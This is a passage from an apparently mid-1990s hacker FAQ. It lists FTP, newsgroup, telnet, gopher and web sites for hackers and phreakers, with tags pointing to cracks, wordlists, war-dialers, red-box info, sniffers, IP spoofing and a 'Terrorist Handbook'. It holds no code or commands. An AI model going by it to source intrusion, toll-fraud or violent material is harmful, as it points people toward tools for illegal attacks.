  4826. N ftp.netcom.com          /pub/je/jericho                 (H/P)
  4827.   ftp.netcom.com          /pub/le/lewiz                   (Social Engineering)
  4828. N ftp.netcom.com          /pub/ty/tym                     (TYM)
  4829.   ftp.netcom.com          /pub/va/vandal                  (DnA)
  4830.   ftp.netcom.com          /pub/wt/wtech/
  4831. N ftp.netcom.com          /pub/zi/zigweed                 (H/P)
  4832.   ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
  4833.   ftp.netsys.com
  4834.   ftp.ocs.mq.edu.au       /PC/Crypt                       (Cryptology)
  4835.   ftp.ox.ac.uk            /pub/comp/security
  4836.   ftp.ox.ac.uk            /pub/crypto                     (Cryptology)
  4837.   ftp.ox.ac.uk            /pub/wordlists                  (Wordlists)
  4838.   ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
  4839. N ftp.pipex.net           /pub/areacode                   (uk areacodes)
  4840.   ftp.pop.psu.edu
  4841.   ftp.primenet.com        /users/i/insphrk
  4842.   ftp.primenet.com        /users/k/kludge                 (H/P)
  4843.   ftp.primenet.com        /users/s/scuzzy                 (Copy Protection)
  4844.   ftp.primus.com          /pub/security                   (Security)
  4845.   ftp.psy.uq.oz.au
  4846.   ftp.psy.uq.oz.au        /pub/DES
  4847.   ftp.rahul.net           /pub/conquest/DeadelviS/script/vms/
  4848.   ftp.rahul.net           /pub/lps                        (Home of the FAQ)
  4849.   ftp.sert.edu.au
  4850.   ftp.sgi.com
  4851. N ftp.smartlink.net       /pub/users/mikes/haq
  4852.   ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
  4853.   ftp.std.com             /obi/Mischief/                  (MIT Guide to Locks)
  4854.   ftp.std.com             /obi/Phracks                    (Zines)
  4855.   ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
  4856.   ftp.sura.net            /pub/security                   (SURAnet)
  4857.   ftp.technet.sg
  4858. U ftp.technion.ac.il
  4859.   ftp.tis.com             /pub                            (TIS)
  4860.   ftp.tisl.ukans.edu      /pub/security
  4861.   ftp.uni-koeln.de                                        (Wordlists)
  4862.   ftp.uspto.gov
  4863.   ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
  4864.   ftp.uwp.edu             /pub/dos/romulus/cracks         (Copy Protection)
  4865.   ftp.vis.colostate.edu
  4866.   ftp.vix.com
  4867.   ftp.vortex.com
  4868.   ftp.warwick.ac.uk       /pub/cud                        (Zines)
  4869.   ftp.wi.leidenuniv.nl    /pub/security
  4870.   ftp.win.tue.nl          /pub/security                   (Security)
  4871.   ftp.winternet.com       /users/nitehwk                  (H/P)
  4872.   ftp.wustl.edu           /doc/EFF                        (EFF)
  4873.   ftp.zoom.com
  4874.   ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto    (Cryptology)
  4875.   garbo.uwasa.fi          /pc/crypt                       (Cryptology)
  4876. N gemini.tuc.noao.edu     /pub/grandi
  4877.   gti.net                 /pub/safetynet
  4878.   gumby.dsd.trw.com
  4879.   hack-this.pc.cc.cmu.edu                                 (Down for Summer)
  4880.   heffer.lab.csuchico.edu                        (Third Stone From The Sun)
  4881.   hplyot.obspm.fr
  4882.   info.mcs.anl.gov
  4883. N infonexus.com           /pub                            (The Guild)
  4884.   jerico.usc.edu
  4885.   l0pht.com                                               (The L0pht)
  4886.   lcs.mit.edu             /telecom-archives               (Telecom archives)
  4887.   lod.com                                                 (Legion of Doom)
  4888.   mac.archive.umich.edu
  4889.   mary.iia.org            /pub/users/patriot              (Misc)
  4890.   monet.ccs.itd.umich.edu
  4891. N net-dist.mit.edu        /pub/pgp
  4892.   net.tamu.edu            /pub/security/TAMU              (Security)
  4893.   net23.com               /pub                            (Max Headroom)
  4894.   nic.ddn.mil             /scc                            (DDN Security)
  4895.   nic.sura.net            /pub/security
  4896.   oak.oakland.edu         /pub/hamradio                   (Ham Radio)
  4897.   oak.oakland.edu         /SimTel/msdos/sound             (DTMF decoders)
  4898.   oak.oakland.edu         /SimTel/msdos/sysutil           (BIOS attackers)
  4899.   parcftp.xerox.com
  4900.   prism.nmt.edu           /pub/misc                       (Terrorist Handbook)
  4901.   pyrite.rutgers.edu      /pub/security                   (Security)
  4902.   relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
  4903.   rena.dit.co.jp          /pub/security                   (Security)
  4904.   research.att.com        /dist/internet_security         (AT&T)
  4905.   ripem.msu.edu           /pub/crypt                      (Ripem)
  4906. N rmii.com                /pub2/KRaD                      (KRaD Magazine)
  4907.   rtfm.mit.edu                                            (Etext)
  4908.   rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
  4909.   scss3.cl.msu.edu        /pub/crypt                      (Cryptology)
  4910. N sgigate.sgi.com         /Security                       (SGI Security)
  4911.   sierra.stanford.edu
  4912.   spy.org                                                 (CSC)
  4913. N src.doc.ic.ac.uk        /usenet/uk.telecom              (uk.telecom archives)
  4914.   suburbia.apana.org.au   /pub/unix/security              (Security)
  4915.   sunsolve1.sun.com
  4916.   theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
  4917.   titania.mathematik.uni-ulm.de /pub/security             (Security)
  4918.   toxicwaste.mit.edu      /pub/rsa129/README              (Breaking RSA)
  4919.   ugle.unit.no
  4920.   unipc20.unimed.sintef.no
  4921.   vic.cc.purdue.edu
  4922.   vixen.cso.uiuc.edu      /security
  4923. N web.mit.edu
  4924.   whacked.l0pht.com                                       (Mac + H/P)
  4925.   wimsey.bc.ca            /pub/crypto                     (Cryptology)
  4926. N wuarchive.wustl.edu     /pub/aminet/util/crypt
  4927.  
  4928.  
  4929. 02. What are some fsp sites of interest to hackers?
  4930.  
  4931.   None at this time.
  4932.  
  4933.  
  4934. 03. What are some newsgroups of interest to hackers?
  4935.  
  4936.   alt.2600                 Do it 'til it hertz
  4937. N alt.2600hz
  4938. N alt.2600.codez
  4939. N alt.2600.debate
  4940. N alt.2600.moderated
  4941.   alt.cellular
  4942.   alt.cellular-phone-tech  Brilliant telephony mind blow netnews naming
  4943.   alt.comp.virus           An unmoderated forum for discussing viruses
  4944.   alt.comp.virus.source.code
  4945.   alt.cracks               Heavy toolbelt wearers of the world, unite
  4946.   alt.cyberpunk            High-tech low-life.
  4947.   alt.cyberspace           Cyberspace and how it should work.
  4948.   alt.dcom.telecom         Discussion of telecommunications technology
  4949.   alt.engr.explosives      [no description available]
  4950.   alt.fan.kevin-mitnick
  4951.   alt.fan.lewiz            Lewis De Payne fan club
  4952.   alt.hackers              Descriptions of projects currently under development
  4953.   alt.hackintosh
  4954.   alt.locksmithing         You locked your keys in *where*?
  4955.   alt.hackers.malicious    The really bad guys - don't take candy from them
  4956.   alt.ph.uk                United Kingdom version of alt.2600
  4957.   alt.privacy.anon-server  Tech. & policy matters of anonymous contact servers
  4958.   alt.radio.pirate         Hide the gear, here comes the magic station-wagons.
  4959.   alt.radio.scanner        Discussion of scanning radio receivers.
  4960.   alt.satellite.tv.europe  All about European satellite tv
  4961.   alt.security             Security issues on computer systems
  4962.   alt.security.index       Pointers to good stuff in misc.security (Moderated)
  4963.   alt.security.keydist     Exchange of keys for public key encryption systems
  4964.   alt.security.pgp         The Pretty Good Privacy package
  4965.   alt.security.ripem       A secure email system illegal to export from the US
  4966.   comp.dcom.cellular       [no description available]
  4967.   comp.dcom.telecom        Telecommunications digest (Moderated)
  4968.   comp.dcom.telecom.tech   [no description available]
  4969.   comp.org.cpsr.announce   Computer Professionals for Social Responsibility
  4970.   comp.org.cpsr.talk       Issues of computing and social responsibility
  4971.   comp.org.eff.news        News from the Electronic Frontiers Foundation
  4972.   comp.org.eff.talk        Discussion of EFF goals, strategies, etc.
  4973. N comp.os.netware.security Netware Security issues
  4974.   comp.protocols.kerberos  The Kerberos authentification server
  4975.   comp.protocols.tcp-ip    TCP and IP network protocols
  4976.   comp.risks               Risks to the public from computers & users
  4977.   comp.security.announce   Announcements from the CERT about security
  4978. N comp.security.firewalls  Anything pertaining to network firewall security
  4979.   comp.security.misc       Security issues of computers and networks
  4980.   comp.security.unix       Discussion of Unix security
  4981.   comp.virus               Computer viruses & security (Moderated)
  4982.   de.org.ccc               Mitteilungen des CCC e.V.
  4983.   misc.security            Security in general, not just computers (Moderated)
  4984.   rec.pyrotechnics         Fireworks, rocketry, safety, & other topics
  4985.   rec.radio.scanner        [no description available]
  4986.   rec.video.cable-tv       Technical and regulatory issues of cable television
  4987.   sci.crypt                Different methods of data en/decryption
  4988.  
  4989.  
  4990. 04. What are some telnet sites of interest to hackers?
  4991.  
  4992.   anarchy-online.com
  4993.   ntiabbs.ntia.doc.gov                  (NTIA)
  4994.   l0pht.com                             (The L0pht)
  4995.   sfpg.gcomm.com                        (The Floating Pancreas)
  4996.   telnet lust.isca.uiowa.edu 2600       (underground bbs) (temporarily down)
  4997.   pcspm2.dar.csiro.au                   (Virtual Doughnutland BBS)
  4998.   prince.carleton.ca 31337              (Twilight of The Idols)
  4999. N spy.org                               (Computer Systems Consulting)
  5000.  
  5001. 05. What are some gopher sites of interest to hackers?
  5002.  
  5003.   ba.com                  (Bell Atlantic)
  5004. N cell-relay.indiana.edu  (Cell Relay Retreat)
  5005.   csrc.ncsl.nist.gov      (NIST Security Gopher)
  5006.   gopher.acm.org          (SIGSAC (Security, Audit & Control))
  5007.   gopher.cpsr.org         (Computer Professionals for Social Responsibility)
  5008.   gopher.eff.org          (Electonic Frontier Foundation)
  5009. N gopher.panix.com        (Panix)
  5010.   gw.PacBell.com          (Pacific Bell)
  5011.   iitf.doc.gov            (NITA -- IITF)
  5012. N info.itu.ch             (International Telegraph Union)
  5013.   ncjrs.aspensys.com      (National Criminal Justice Reference Service)
  5014.   oss.net                 (Open Source Solutions)
  5015.   spy.org                 (Computer Systems Consulting)
  5016.   wiretap.spies.com       (Wiretap)
  5017.  
  5018.  
  5019. 06. What are some World wide Web (WWW) sites of interest to hackers?
  5020.  
  5021. N 134.220.198.66:8000                           (Peter Strangman's)
  5022. U alcuin.plymouth.edu/~jay/underground.html     (Underground Links)
  5023. U all.net                 (American Society for Industrial Security Management)
  5024.   alumni.caltech.edu/~dank/isdn/                (ISDN)
  5025. N asearch.mccmedia.com/www-security.html        (WWW-security info)
  5026.   aset.rsoc.rockwell.com                        (NASA/MOD AIS Security)
  5027.   aset.rsoc.rockwell.com/exhibit.html           (Tech. for Info Sec)
  5028.   att.net/dir800                                (800 directory)
  5029.   ausg.dartmouth.edu/security.html              (UNIX Security Topics)
  5030. N bianca.com/bump/ua                            (Unauthorized Access Home Page)
  5031. N ccnga.uwaterloo.ca/~jscouria/gsm.html         (GSM Specification)
  5032. N cell-relay.indiana.edu/cell-relay             (Cell Relay Retreat)
  5033. N ciac.llnl.gov                                 (CIAC Web Site)
  5034. N community.net/community/all/home/solano/sbaldwin
  5035. N cs.purdue.edu/homes/spaf/coast.html           (The COAST Project and Laboratory)
  5036. N csbh.mhv.net/dcypher/home.html                (Dcypher's Home Page)
  5037. N csrc.ncsl.nist.gov                            (NIST)
  5038. N cwix.com/cwplc                                (Cable and Wireless)
  5039.   daemon.apana.org.au/~longi/
  5040. N dcpu1.cs.york.ac.uk:6666/fisher/telecom       (Embryonic Telephone History Page)
  5041. N dfw.net/~aleph1                               (The Uebercracker's Security Web)
  5042. N draco.centerline.com:8080/~franl/crypto.html  (Crypto)
  5043. N draco.centerline.com:8080/~franl/privacy/bacard-review.html
  5044. N enigma.pc.cc.cmu.edu/~caffeine/home.html      (Caffeine's Home Page)
  5045. N everest.cs.ucdavis.edu/Security.html          (UCDavis.edu Security Page)
  5046. N everest.cs.ucdavis.edu/slides/slides.html     (Security Lab Slides)
  5047.   ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR)
  5048. N fastlane.net/homepages/thegnome               (Simple Nomad)
  5049. N first.org                                     (FIRST)
  5050. N freeside.com/phrack.html                      (Phrack Magazine)
  5051. N frosted.mhv.net/keytrap.html
  5052. N ftp.arpa.mil                                  (ARPA home page)
  5053.   ftp.tamu.edu/~abr8030/security.html           (Security)
  5054. N grove.ufl.edu/~bytor                          (Bytor home page)
  5055. N hightop.nrl.navy.mil/potpourri.html           (MOD Security)
  5056. N hightop.nrl.navy.mil/rainbow.html             (MOD Rainbow Books)
  5057.   ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)
  5058.   ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)
  5059.   info.bellcore.com/BETSI/betsi.html            (Betsi)
  5060. N info.gte.com                                  (GTE Labrotories)
  5061. N info.mcc.ac.uk/Orange                         (Orange)
  5062.   infosec.nosc.mil/infosec.html                 (SPAWAR INFOSEC)
  5063. N infosec.nosc.mil/navcirt.html                 (NAVCIRT)
  5064. N iss.net/iss                                   (Internet Security Systems)
  5065. N jumper.mcc.ac.uk/~afs/telecom                 (UK Telecom Pricing Information)
  5066.   l0pht.com                                     (The l0pht)
  5067.   l0pht.com/~oblivion/IIRG.html                 (Phantasy Magazine)
  5068. N l0pht.com/~spacerog/index.html                (Whacked Mac Archives)
  5069. N lcs.mit.edu/telecom-archives/areacodes/guide  (North American Area Codes)
  5070. N lcs.mit.edu/telecom-archives/npa.800          (1-800 Info)
  5071. N lcs.mit.edu/telecom-archives/npa.900          (1-900 Info)
  5072. N lod.com                                       (Legion of Doom)
  5073. N lod.com/~gatsby                               (Gatsby)
  5074. N lod.com/~tabas                                (Mark Tabas -- LOD)
  5075. N lod.com/~vampire/emptime7                     (Empire Times)
  5076. N magicnet.net/xtabi/netscape/links/cypher.html (Cryptology)
  5077. N mars.superlink.net/user/esquire               (Red box info)
  5078.   matrix.resnet.upenn.edu/rourke                (FakeMail FAQ)
  5079.   mindlink.jolt.com                             (The Secrets of LockPicking)
  5080. N mindlink.net/A7657                            (Stephen H Kawamoto's Home Page)
  5081.   mls.saic.com                                  (SAIC MLS)
  5082. N mnementh.cs.adfa.oz.au/Lawrie_Brown.html      (Lawrie Brown's crypto bibliography)
  5083.   motserv.indirect.com                          (Motorola)
  5084. U naic.nasa.gov/fbi                             (FBI information)
  5085. U nasirc.nasa.gov/NASIRC_home.html              (NASIRC)
  5086.   obscura.com/~loki/                            (Cryptology)
  5087.   ophie.hughes.american.edu/~ophie              (Ophie)
  5088.   oregano.sl.pitt.edu/index.htm
  5089. N outpost.callnet.com/outpost.html
  5090.   pages.ripco.com:8080/~glr/glr.html            (Full Disclosure)
  5091. U peg.pegasus.oz.au                             (EFF Australia)
  5092. N quetel.qc.ca/qt0000ag.htm                     (Quebec-Telephone)
  5093. N resudox.net/bio/mainpage.html                 (BioHazard's Home Page)
  5094. N ripco.com:8080/~glr/glr.html                  (Full Disclosure)
  5095. N rschp2.anu.edu.au:8080/crypt.html
  5096. N scitsc.wlv.ac.uk/~cs6171/hack                 (UNIX Security)
  5097. U seclab.cs.ucdavis.edu/Security.html           (Security)
  5098. U seclab.cs.ucdavis.edu/slides/slides.html      (Security Lab Slides)
  5099. N sfpg.gcomm.com/mitnick/mitnick.htm            (3wP Kevin Mitnick WWW HomePage)
  5100. N smurfland.cit.buffalo.edu/NetMan/index.html   (Network Management)
  5101. N sunsite.unc.edu/sun/inform/sun-info.html      (Sun Microsystems Sponsor Page)
  5102. N support.mayfield.hp.com                       (Hewlett Packard SupportLine Services)
  5103. N tamsun.tamu.edu/~clm3840/hacking.html         (Hacking/Phreaking)
  5104.   the-tech.mit.edu                              (LaMacchia case info)
  5105. N town.hall.org/university/security/stoll/cliff.html (Cliff Stoll)
  5106.   turnpike.net/emporium/C/celestial/celest.html (Detective Databases 1995)
  5107.   ucs.orst.edu:8001/mintro.html                 (Micro Power Broadcasting)
  5108.   underground.org                               (Eubercrackers)
  5109.   unixg.ubc.ca:780/~jyee/                       (Cell)
  5110.   w3.gti.net/safety
  5111. N web.mit.edu/network/pgp.html                  (Getting PGP)
  5112. N web.nec.com/products/necam/mrd/cellphones/index.html(NEC)
  5113. U weber.u.washington.edu/~phantom/cpunk/index.html  (Cryptology)
  5114. N wildsau.idv.uni-linz.ac.at/~klon/underground/underground.html (Klon's Underground Links)
  5115.   wintermute.itd.nrl.navy.mil/5544.html         (Network Security)
  5116. N www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
  5117. N www-ns.rutgers.edu/www-security/index.html    (Rutger's documents on WWW security)
  5118. U www-personal.engin.umich.edu/~jgotts/underground/boxes.html   (Box info)
  5119. U www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html(This document)
  5120. N www-swiss.ai.mit.edu/~bal/pks-toplev.html     (Findingsomeone's PGP key)
  5121.   www.2600.com                                  (2600 Magazine)
  5122. N www.8lgm.org                                  (8lgm Security Advisories)
  5123.   www.aads.net                                  (Ameritech)
  5124. N www.access.gpo.gov/su_docs/
  5125. N www.aloha.com/~seanw/index.html
  5126.   www.alw.nih.gov/WWW/security.html             (Unix Security)
  5127. N www.artcom.de/CCC/hotlist.html                (Chaos Computer Club Hotlist)
  5128. N www.artech-house.com/artech.html              (Artech House)
  5129. N www.asg.unb.ca                                (Atlantic Systems Group Mosaic Index)
  5130.   www.aspentec.com/~frzmtdb/fun/hacker.html
  5131. N www.aston.ac.uk/~bromejt/mobile.html          (Mobile Phone Service Locator)
  5132. N www.att.com                                   (ATT)
  5133. N www.auditel.com                               (Auditel)
  5134. N www.auscert.org.au                            (Australian CERT)
  5135. N www.axent.com/axent                           (Axent Technologies)
  5136.   www.ba.com                                    (Bell Atlantic)
  5137. N www.bctel.com                                 (BC Tel)
  5138.   www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
  5139. N www.bell.ca                                   (Bell Canada)
  5140.   www.bell.com                                  (MFJ Task Force)
  5141.   www.bellcore.com/SECURITY/security.html       (Bellcore Security Products)
  5142. N www.border.com                                (Border Network Technologies)
  5143.   www.brad.ac.uk/~nasmith/index.html
  5144. N www.brad.ac.uk/~nasmith/underground.html      (Undergound WWW Sites)
  5145.   www.bst.bls.com                               (BellSouth)
  5146. N www.bt.co.uk                                  (British Telecom)
  5147. N www.business.co.uk/cellnet                    (Cellnet)
  5148. N www.c2.org:80/remail/by-www.html              (WWW-based remailing form)
  5149.   www.c3.lanl.gov/~mcn                          (Lanl)
  5150.   www.cam.org/~gagnon                           (OCP's)
  5151. U www.careermosaic.com/cm/uswest                (USWest)
  5152. N www.castle.net/~kobrien/telecom.html          (Telecom)
  5153. N www.cco.caltech.edu/~rknop/amiga_pgp26.html
  5154. N www.cdt.org/cda.html
  5155. N www.cec.wustl.edu/~dmm2/egs/egs.html          (En Garde Systems)
  5156.   www.cert.dfn.de/                              (German First Team)
  5157. N www.checkpoint.com                            (Checkpoint)
  5158. N www.chem.surrey.ac.uk/~ch11mh/secure.html     (Another page on secure WWW server setup)
  5159. N www.cis.ksu.edu/~psiber/fortress/phreak/ph2reak.html (Are You Some Kind Of PHREAK!)
  5160.   www.cis.ohio-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html
  5161. N www.cityscape.co.uk/users/ek80/index.html     (Inside Cable Cover)
  5162. N www.cohesive.com                              (Cohesive Systems)
  5163.   www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
  5164.   www.con.wesleyan.edu/~triemer/network/docservs.html
  5165.   www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
  5166. N www.cosc.georgetown.edu/~denning/crypto       (The Cryptography Project)
  5167. N www.cost.se                                   (COST Computer Security Technologies)
  5168.   www.cpsr.org/home                             (CPSR)
  5169. N www.crimson.com/isdn/telecomacry.txt          (Crimson's Telecommunications Acronyms)
  5170. N www.crtc.gc.ca                                (CRTC - Canadian regulator)
  5171. N www.cs.berkeley.edu/~raph/remailer-list.html  (Anon remailer list)
  5172. U www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html  (CMU Security)
  5173. U www.cs.purdue.edu/coast/coast.html            (Coast)
  5174. N www.cs.purdue.edu/pcert/pcert.html            (PCERT)
  5175. N www.cs.tu-bs.de                               (Network management Tools)
  5176.   www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)
  5177.   www.cs.umd.edu/~lgas                          (Laughing Gas)
  5178. N www.cs.umd.edu/~lgas/haquerwerld/haquer-individuals.html(Haquerwerld)
  5179.   www.csd.harris.com/secure_info.html           (Harris)
  5180.   www.csl.sri.com                               (SRI Computer Science Lab)
  5181. U www.csua.berekeley.edu/pub/cypherpunks/Home.html  (Cryptology)
  5182. N www.cwi.nl/cwi/people/Jack.Jansen/spunk/cookbook.html
  5183. N www.cyber.co.uk/~joyrex                       (Joyrex Cellular)
  5184.   www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)
  5185. N www.cygnus.com/~gnu/export.html               (Cryptography Export Control Archives)
  5186. U www.datafellows.fi                            (Data Fellows (F-Prot)
  5187. N www.datasync.com/~sotmesc/sotmesc.html        (SotMESC)
  5188. N www.dcs.exeter.ac.uk/~aba                     (Cypherpunk)
  5189.   www.dct.ac.uk/~misb3cp/2600/faq.txt
  5190. N www.demon.co.uk/mobiles                       (C.C.Mobiles)
  5191. N www.dhp.com                                   (DataHaven Project)
  5192. N www.dhp.com/~pluvius                          (Pluvius' Home Page)
  5193. U www.digicash.com/ecash/ecash-home.html        (Ecash Home Page)
  5194.   www.digital.com/info/key-secure-index.html    (Digital Secure Systems)
  5195.   www.dnai.com/~gui/index.html
  5196. N www.dtic.dla.mil/defenselink                  (Office of the U.S. Secretary of Defense (OSD)
  5197. N www.dtic.dla.mil/iac                          (DoD Information Analysis Center (IAC) Hub Page)
  5198. N www.eecs.nwu.edu/~jmyers/bugtraq/about.html
  5199. N www.eecs.nwu.edu/~jmyers/bugtraq/archives.html
  5200.   www.eecs.nwu.edu/~jmyers/bugtraq/index.html   (Bugtraq)
  5201.   www.eecs.nwu.edu/~jmyers/ids/index.html       (Intrusion Detection Systems)
  5202. N www.eff.org
  5203. N www.eff.org/pub/Alerts
  5204. N www.eff.org/pub/Net_info/Tools/Crypto/
  5205.   www.emap.co.uk/partners/racal-airtech         (Racal-Airtech)
  5206.   www.ensta.fr/internet/unix/sys_admin          (System administration)
  5207. N www.epic.org
  5208. N www.ericsson.nl                               (Ericsson)
  5209.   www.etext.org/Zines/                          (Zines)
  5210. N www.farmstead.com                             (Farmstead)
  5211. U www.fbi.gov/fbi/FBI_homepage.html             (FBI Homepage)
  5212.   www.fc.net/defcon                             (DefCon)
  5213.   www.fedworld.gov                              (Federal Government)
  5214.   www.first.org/first/                          (FIRST)
  5215. N www.fonorola.net                              (Fonorola (a Canadian carrier)
  5216. N www.frus.com                                  (Firewalls R Us)
  5217.   www.gbnet.net/kbridge                         (KarlBridge)
  5218.   www.getnet.com/crak                           (CRAK Software)
  5219. N www.getnet.com/~vision
  5220. N www.gold.net/users/cw78                       (FleXtel)
  5221.   www.greatcircle.com                           (Great Circle Associates)
  5222. N www.gsu.edu/~socrerx/catalog.html
  5223. N www.gta.com/index.html                        (Global Technology Associates)
  5224. N www.gti.net/grayarea                          (Gray Areas)
  5225. U www.hotwired.com                              (Wired Magazine)
  5226.   www.hpcc.gov/blue94/section.4.6.html          (NSA)
  5227. N www.hq2.telecom.ie                            (Telecom Eireann)
  5228. N www.iacr.org/~iacr                            (International Association of Cryptologic Research (IACR)
  5229. N www.ibmpcug.co.uk/~Vidtron                    (Videotron)
  5230. N www.ic.gov                                    (Central Intelligence Agency Home Page)
  5231. N www.ifi.uio.no/~staalesc/PGP/home.html
  5232. N www.iia.org/~gautier/me.html                  (Rich Gautier's Home Page)
  5233. N www.indirect.com/www/evildawg
  5234.   www.indirect.com/www/johnk/                   (CRAK Software)
  5235. N www.ingress.com                               (Ingress Communications)
  5236. N www.interaccess.com/trc/tsa.html
  5237. N www.io.org/~djcl/phoneb.html
  5238. N www.iquest.net/~oseidler                      (Oliver Seidler's WWW Page)
  5239. N www.itd.nrl.navy.mil/ITD/5540                 (NRL Center for High Assurance Computer Systems)
  5240. N www.itu.ch/TELECOM                            (Telecom '95)
  5241. N www.jagunet.com/~john/
  5242. N www.jedefense.com/jed.html                    (Journal of Electronic Defense)
  5243. N www.l0pht.com/cdc.html                        (Cult of the Dead Cow)
  5244. N www.l0pht.com/radiophone                      (Radiophone Archive)
  5245. N www.l0pht.com/~oblivion/IIRG.html             (International Information Retrieval Guild Archive Site)
  5246. N www.lat.com                                   (Los Altos Technologies)
  5247.   www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
  5248. N www.lib.iup.edu/~seaman/hack/bone.html        (Bone's H/P/C page o' rama)
  5249. N www.links.net
  5250. N www.louisville.edu/~wrbake01                  (The GodZ of CyberSpacE)
  5251.   www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)
  5252.   www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)
  5253.   www.magi.com/~vektor/linenoiz.html
  5254. N www.mastercard.com                       (Secure Electronic Payment Protocol)
  5255.   www.mcs.com/~candyman/http/radio.html         (Radar)
  5256.   www.mcs.com/~candyman/under.html              (Cell)
  5257. N www.mcs.net/~candyman                         (H/P)
  5258.   www.mgmua.com/hackers/index.html              (Hackers, the movie)
  5259. N www.milkyway.com                              (Milkyway Networks Corporation)
  5260. N www.mit.edu:8001/people/warlord/pgp-faq.html  (PGP 2.6.2 FAQ, Buglist, Fixes, and Improvements)
  5261. N www.monmouth.com/~jshahom                     (The Insomniac's Home Page)
  5262. N www.mot.com                                   (Motorola)
  5263.   www.mpr.ca/                                   (MPR Teltech Ltd)
  5264. N www.msen.com/~emv/tubed/spoofing.html         (Info on IP spoofing attacks)
  5265. N www.mwjournal.com/mwj.html                    (Microwave Journal)
  5266. N www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/security.html(Security in Mosaic)
  5267. N www.ncsl.nist.gov                             (NIST Computer Systems Laboratory)
  5268.   www.net23.com                                 (Max Headroom)
  5269. N www.netpart.com                               (NetPartners)
  5270.   www.netresponse.com:80/zldf/
  5271. N www.nic.surfnet.nl/surfnet/security/cert-nl.html(CERT-NL)
  5272.   www.nist.gov                                  (NIST)
  5273. N www.nokia.com                                 (Nokia)
  5274. N www.nortel.com                                (Northern Telecom)
  5275.   www.ntt.jp                                    (Nippon Telephone)
  5276. N www.nynex.co.uk/nynex                         (NYNEX)
  5277. U www.odci.gov                                  (The CIA)
  5278. N www.one2one.co.uk                             (Mercury One-2-One)
  5279. N www.open.gov.uk/oftel/oftelwww/oftelhm.htm    (OFTEL's Home Page)
  5280.   www.openmarket.com/info/cryptography/applied_cryptography.html
  5281.   www.pacbell.com                               (Pacific Bell)
  5282. N www.panix.com/vtw
  5283.   www.paranoia.com/astrostar/fringe.html
  5284. N www.paranoia.com/hpa                          (Paranoia's H/P/A Links)
  5285.   www.paranoia.com/mthreat                      (ToneLoc)
  5286. N www.paranoia.com/~coldfire                    (Cold Fire's Web Page)
  5287. N www.paranoia.com/~darkfox                     (Darkfox's Home Page)
  5288. N www.paranoia.com/~ice9                        (Ice-9's Home Page)
  5289.   www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
  5290. N www.phantom.com/~darkcyde                     (DarkCyde)
  5291. N www.phantom.com/~king                         (Randy King's WWW Page)
  5292. N www.phillips.com                              (Phillips Electronics)
  5293. N www.phred.org                                 (The Phred Networking Organization)
  5294. N www.pic.net/uniloc/starlink                   (Starlink)
  5295.   www.planet.net/onkeld                         (BlueBeep Home Page)
  5296.   www.primenet.com/~kludge/haqr.html            (Kludge)
  5297.   www.quadralay.com/www/Crypt/Crypt.html        (Quadralay Cryptography)
  5298.   www.qualcomm.com/cdma/wireless.html           (Qualcomm CDMA)
  5299. N www.ramp.com/~lcs/winpgp.html                 (PGP with MS/Win)
  5300. N www.raptor.com                                (Raptor)
  5301.   www.raptor.com/raptor/raptor.html             (Raptor Network Isolator)
  5302.   www.research.att.com                          (AT&T)
  5303. N www.rocksoft.com/~ross                        (Rocksoft Pty (Veracity)
  5304. N www.rogers.com                                (Rogers Communications)
  5305.   www.rsa.com                                   (RSA Data Security)
  5306. N www.sasknet.sk.ca/Pages/sktlhome.html         (SaskTel)
  5307.   www.satelnet.org/~ccappuc
  5308. N www.sccsi.com/lsli/lsli.homepage.html         (PORTUS)
  5309. N www.sctc.com                                  (Secure Computing Corporation)
  5310.   www.seas.upenn.edu/~rourkem                   (FakeMail FAQ)
  5311. N www.seduction.com
  5312. N www.sei.cmu.edu/SEI/programs/cert.html        (CERT Coordination Center)
  5313. N www.service.com/cm/uswest/usw1.html           (USWest)
  5314. N www.shore.net/~eskwired/hp.html
  5315. N www.soci.niu.edu/~cudigest
  5316. N www.somar.com                                 (Somar Software)
  5317. N www.soscorp.com                               (Sources of Supply Corp)
  5318.   www.spatz.com/pecos/index.html                (The World of Hacking)
  5319.   www.spy.org                                   (Computer Systems Consulting)
  5320. N www.spy.org                                   (spy.org)
  5321.   www.sri.com                                   (SRI)
  5322. N www.stentor.ca                                (Stentor (Canadian telcos)
  5323. N www.tecc.co.uk/public/uk-telecom/btns.html    (BT "star services")
  5324. N www.telecoms-mag.com/tcs.html                 (Telecommunications Magazine)
  5325. N www.telkom.co.za                              (Telkom S.A. Ltd)
  5326.   www.telstra.com.au/info/security.html         (Security Reference Index)
  5327. N www.teresa.com
  5328.   www.tezcat.com/web/security/security_top_level.html
  5329. N www.tiac.net/users/triad/philes/jokai.html    (Jokai Reservation for the Preservation of the 1st Amendment)
  5330. N www.ticllc.net/~scrtnizr
  5331.   www.tis.com                                   (Trusted Information Systems)
  5332. N www.trcone.com/t_crookb.html                  (CrookBook)
  5333. N www.tregistry.com/ttr                         (Telecomunications Training Courses)
  5334.   www.tri.sbc.com                               (Southwestern Bell)
  5335.   www.tricon.net/Comm/synapse                   (Synapse Magazine)
